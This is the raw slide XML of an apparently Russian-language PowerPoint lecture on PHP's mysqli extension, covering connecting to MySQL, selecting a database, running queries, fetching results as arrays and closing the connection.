              <a:t>с сервером баз данных </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Выбор </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>базы данных</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Исполнение запроса</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Получение результата запроса</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Полезные функции</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Подготовленные запросы</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Расширение </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>MySQL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Алгоритм работы с сервером баз данных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MySQL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395288" y="1571625"/>
            <a:ext cx="9093200" cy="6034088"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Подключение необходимого расширения в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>php.ini</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>php_mysqli.dll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Устанавливаем соединение с сервером БД</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Выбираем базу данных для работы</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Посылаем запрос</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>При выборке (SELECT), работаем с выбранными данными</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Закрываем соединение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Работа с соединением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95288" y="1571625"/>
            <a:ext cx="8748712" cy="6034088"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" dirty="0" smtClean="0"/>
              <a:t> ([ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" dirty="0" smtClean="0"/>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" dirty="0" smtClean="0"/>
              <a:t> [, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" dirty="0" smtClean="0"/>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" dirty="0" smtClean="0"/>
              <a:t> [, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" dirty="0" smtClean="0"/>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" dirty="0" smtClean="0"/>
              <a:t> [, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" dirty="0" smtClean="0"/>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>dbname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" dirty="0" smtClean="0"/>
              <a:t> [, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" dirty="0" smtClean="0"/>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" dirty="0" smtClean="0"/>
              <a:t> ]]]]] )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Возвращает объект в случае успешного выполнения, или FALSE при неудаче</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>mysqli.default_host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>mysqli.default_user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>mysqli.default_pw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, "", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>mysqli.default_port</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>bool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>close</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" dirty="0" smtClean="0"/>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>link</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" dirty="0" smtClean="0"/>
              <a:t> )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Закрывает соединение с сервером </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Возвращает TRUE в случае успешного завершения или FALSE в случае возникновения ошибки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Соединение и выбор базы данных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-36512" y="1715392"/>
            <a:ext cx="9361288" cy="6034088"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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$link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mysqli_connect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err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>localhost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err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mysql_user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b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				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err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mysql_password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 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err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mysql_db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endParaRPr lang="en-US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mysqli_connect_errno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mysqli_connect_error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();</a:t>
            </a:r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mysqli_get_host_info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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>link</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty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en-US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mysqli_select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>_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db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$link</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty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err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>new_db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ru-RU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mysqli_close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$link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endParaRPr lang="ru-RU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Создание запроса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-36512" y="1715392"/>
            <a:ext cx="9361288" cy="603408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mysqli_query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itchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$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link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 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"SET NAMES 'utf-8'"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2000" dirty="0" smtClean="0"/>
              <a:t>TRUE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>или </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>FALSE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill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007700"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="20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000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0000BB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mysqli_query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$link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 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'SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tbl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'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lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>или </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>FALSE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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mysqli_errno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itchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$link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mysqli_error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>
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$link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endParaRPr lang="en-US" sz="2400" dirty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mysqli_free_result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ru-RU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Получение результата запроса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179512" y="1571625"/>
            <a:ext cx="9217272" cy="6034088"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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mysqli_query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$l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 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"SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>*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 FROM users"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var_dump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      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:latin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mysqli_fetch_array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b="1" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Стрелка вправо 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3979863" y="2084388"/>
            <a:ext cx="520700" cy="295275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32313" y="3914775"/>
          <a:ext cx="3270250" cy="11414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5042"/>
                <a:gridCol w="1522910"/>
                <a:gridCol w="1202298"/>
              </a:tblGrid>
              <a:tr h="380471"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</a:tr>
              <a:tr h="380471"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  <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="12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</a:tr>
              <a:tr h="380471"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  <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1200" b="1" smtClean="0">
                          <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>Петров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PETR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4" marR="91434" marT="45708" marB="45708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71550" y="3870325"/>
          <a:ext cx="1963738" cy="26638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650"/>
                <a:gridCol w="576514"/>
                <a:gridCol w="1138574"/>
              </a:tblGrid>
              <a:tr h="380546">
                <a:tc gridSpan="3">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1200" dirty="0" smtClean="0">
                          <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>Массив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80546">
                <a:tc rowSpan="6">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p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</a:tr>
              <a:tr h="3805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</a:tr>
              <a:tr h="380546">
                <a:tc vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p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  <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="12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</a:tr>
              <a:tr h="3805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  <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1200" b="1" smtClean="0">
                          <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>Иванов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</a:tr>
              <a:tr h="380546">
                <a:tc vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p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code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</a:tr>
              <a:tr h="380546">
                <a:tc vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="ru-RU" sz="11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latin typeface="Courier New" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>IVAN</a:t>
                      </a:r>
                      <a:endParaRPr lang="ru-RU" sz="12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04" marR="91404" marT="45717" marB="45717"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Стрелка вниз 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1043608" y="3195638"/>
            <a:ext cx="252412" cy="520700"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50178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8" name="Стрелка вниз 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5529263" y="3167063"/>
            <a:ext cx="266700" cy="549275"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50172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9" name="Полилиния 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-559008">
            <a:off x="1595438" y="3806825"/>
            <a:ext cx="3054350" cy="820738"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 3987469 w 2940148"/>
              <a:gd name="T1" fmla="*/ 455331 h 820615"/>
              <a:gd name="T2" fmla="*/ 2270377 w 2940148"/>
              <a:gd name="T3" fmla="*/ 61023 h 820615"/>
              <a:gd name="T4" fmla="*/ 0 w 2940148"/>
              <a:gd name="T5" fmla="*/ 821476 h 820615"/>
              <a:gd name="T6" fmla="*/ 0 w 2940148"/>
              <a:gd name="T7" fmla="*/ 821476 h 820615"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 2940148"/>
              <a:gd name="T13" fmla="*/ 0 h 820615"/>
              <a:gd name="T14" fmla="*/ 2940148 w 2940148"/>
              <a:gd name="T15" fmla="*/ 820615 h 8206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0148" h="820615">
                <a:moveTo>
                  <a:pt x="2940148" y="454855"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2552114" y="227427"/>
                  <a:pt x="2164080" y="0"/>
                  <a:pt x="1674055" y="60960"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1184030" y="121920"/>
                  <a:pt x="0" y="820615"/>
                  <a:pt x="0" y="820615"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="33333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10" name="Овал 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4637088" y="3875088"/>
            <a:ext cx="366712" cy="338137"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr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11" name="Овал 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4565650" y="4267200"/>
            <a:ext cx="365125" cy="3381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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Прямая со стрелкой 11"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="11" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2682875" y="4435475"/>
            <a:ext cx="1882775" cy="368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Полилиния 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1736725" y="3500438"/>
            <a:ext cx="2940050" cy="820737"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2939462 w 2940148"/>
              <a:gd name="T1" fmla="*/ 455331 h 820615"/>
              <a:gd name="T2" fmla="*/ 1673663 w 2940148"/>
              <a:gd name="T3" fmla="*/ 61023 h 820615"/>
              <a:gd name="T4" fmla="*/ 0 w 2940148"/>
              <a:gd name="T5" fmla="*/ 821472 h 820615"/>
              <a:gd name="T6" fmla="*/ 0 w 2940148"/>
              <a:gd name="T7" fmla="*/ 821472 h 820615"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 2940148"/>
              <a:gd name="T13" fmla="*/ 0 h 820615"/>
              <a:gd name="T14" fmla="*/ 2940148 w 2940148"/>
              <a:gd name="T15" fmla="*/ 820615 h 8206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0148" h="820615">
                <a:moveTo>
                  <a:pt x="2940148" y="454855"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2552114" y="227427"/>
                  <a:pt x="2164080" y="0"/>
                  <a:pt x="1674055" y="60960"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1184030" y="121920"/>
                  <a:pt x="0" y="820615"/>
                  <a:pt x="0" y="820615"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="33333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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Прямая со стрелкой 13"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="2727325" y="4376738"/>
            <a:ext cx="1827213" cy="25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Способы получения результата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251520" y="1484313"/>
            <a:ext cx="9073256" cy="6034087"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF8000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF8000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>По умолчанию</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0000BB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mysqli_fetch_array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mysqli_fetch_array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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="007700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MYSQLI_BOTH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FF8000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF8000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Индексированный массив</a:t>
            </a:r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mysqli_fetch_array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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="007700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MYSQLI_NUM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mysqli_fetch_row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FF8000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF8000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Ассоциативный массив</a:t>
            </a:r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mysqli_fetch_array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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="007700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MYSQLI_ASSOC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$row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mysqli_fetch_assoc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endParaRPr lang="ru-RU" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF8000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FF8000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF8000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Полная выборка</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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$full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mysqli_fetch_all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$result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,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
